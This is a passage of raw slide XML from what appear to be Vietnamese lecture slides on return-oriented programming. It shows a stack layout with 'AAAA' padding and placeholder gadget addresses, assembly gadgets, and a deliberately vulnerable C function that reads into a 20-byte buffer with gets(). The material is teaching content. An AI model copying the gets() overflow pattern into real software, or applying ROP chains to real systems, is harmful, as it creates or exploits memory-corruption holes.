                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>[ROP chain address]</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35366865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72702079"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="259664">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>[ROP chain address]</a:t>
                      </a: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86652507"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260373">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>[address of &lt;foo+10&gt;]</a:t>
                      </a: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GB" sz="1400" b="1">
                        <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="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42916235"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="259664">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx2">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>[address of &lt;bar+25&gt;]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx2">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>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021983"/>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400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" b="1">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326764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56351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6094831"/>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79233330"/>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17298906"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="259664">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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563017"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="259664">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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>&amp;n</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ame(tham số của gets)</a:t>
                      </a:r>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75770166"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Google Shape;626;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5831716D-1000-8051-095E-11CB69DD80E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022476" y="1075800"/>
            <a:ext cx="1998648" cy="4431952"/>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>foo:</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A64D79"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>xor %eax, %ebx</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="7030A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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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bar:</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and $1, %edx</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chemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    mov $1, %eax</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    ret</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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vulnerable:</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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    call gets</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    add $4,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mov %ebp, %esp</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r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pop %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    ret</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pP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main:</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    call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a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;629;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B581F3A3-18E5-857C-6A41-CAB872EC5BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217200" y="2954875"/>
            <a:ext cx="2256950" cy="2031295"/>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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void vulnerable(void)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char name[20];</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gets(name);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int main(void) {</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vulnerable();</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    return 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFAF1B3-C6BD-4B1C-5621-8783C40CC8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4648200" y="2743200"/>
            <a:ext cx="1248002" cy="1295400"/>
            <a:chOff x="5029200" y="2971800"/>
            <a:chExt cx="867002" cy="1066800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Connector 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272ADBE8-2E0B-AC85-FF01-9CF54F53430C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5580447" y="4038600"/>
              <a:ext cx="315755"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34D068-4E0E-BE1D-5100-A735955F841D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5580447" y="2971800"/>
              <a:ext cx="0" cy="10668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21D4BB-FD18-ED62-6F4E-68C200DDCC82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5029200" y="2971800"/>
              <a:ext cx="551247" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="1270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6A4FA52-D86B-2445-0C6D-89E5ACDCB65F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4876802" y="1600206"/>
            <a:ext cx="1013922" cy="2117214"/>
            <a:chOff x="5011353" y="2621280"/>
            <a:chExt cx="867002" cy="1066800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Straight Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED9E8FB-4355-547A-85B7-3B239C580555}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5562600" y="3688080"/>
              <a:ext cx="315755"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19C227-B7FC-5FD5-1490-34FD65052199}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5562600" y="2621280"/>
              <a:ext cx="0" cy="106680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5E703C-9865-0E40-C885-E744E2E42DB3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5011353" y="2621280"/>
              <a:ext cx="551247" cy="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D67939B-1257-0D48-E20F-FA6FA45257A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2541885" y="1471047"/>
            <a:ext cx="762000" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D264A98-0C75-EC08-54BE-5F7BC15E2EA9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2133600" y="3886200"/>
              <a:ext cx="762000"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EIP</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D133360A-6363-310F-1FE5-EB1635E68DFC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743200" y="4038600"/>
              <a:ext cx="533400" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Group 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{302CFF30-3822-F9CD-A011-79000BF35BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5080234" y="3312498"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4C8F0C-39CB-5A86-E555-5CF17289378E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5105399" y="6025504"/>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ESP</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4618802-246D-4E2D-5A8D-4A5C04A12553}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="34" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5638800" y="6177904"/>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994766D4-45D6-FBE1-C477-376107B7C0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="4189532"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="4189532"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE70F655-E18B-E362-3F02-E72A65CA2013}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5105399" y="4189532"/>
              <a:ext cx="533401" cy="307736"/>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1400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>EBP</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="38" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE49C42-51A6-05B0-4FF6-C38F849633EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="37" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5638800" y="4341932"/>
              <a:ext cx="257402" cy="1468"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Google Shape;779;p87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{893C6C8D-5755-06EA-3F88-216941ED1A10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="139675" y="1253400"/>
            <a:ext cx="3289325" cy="1477297"/>
            <a:chOff x="139675" y="1253400"/>
            <a:chExt cx="3289325" cy="1477297"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Google Shape;780;p87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EE8FE45-A771-0502-BE61-225C55CFFD7D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="139675" y="1253400"/>
              <a:ext cx="2049000" cy="1477297"/>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cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Lệnh </a:t>
              </a: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ret</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t> luôn lấy ra giá trị ở đỉnh stack và gán cho con trỏ EIP, do đó con trỏ này di chuyển theo chuỗi địa chỉ đã được nạp vào</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Google Shape;781;p87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F534D945-BEC2-4B49-5916-3F483D15437B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2188675" y="1778783"/>
              <a:ext cx="1240325" cy="213367"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
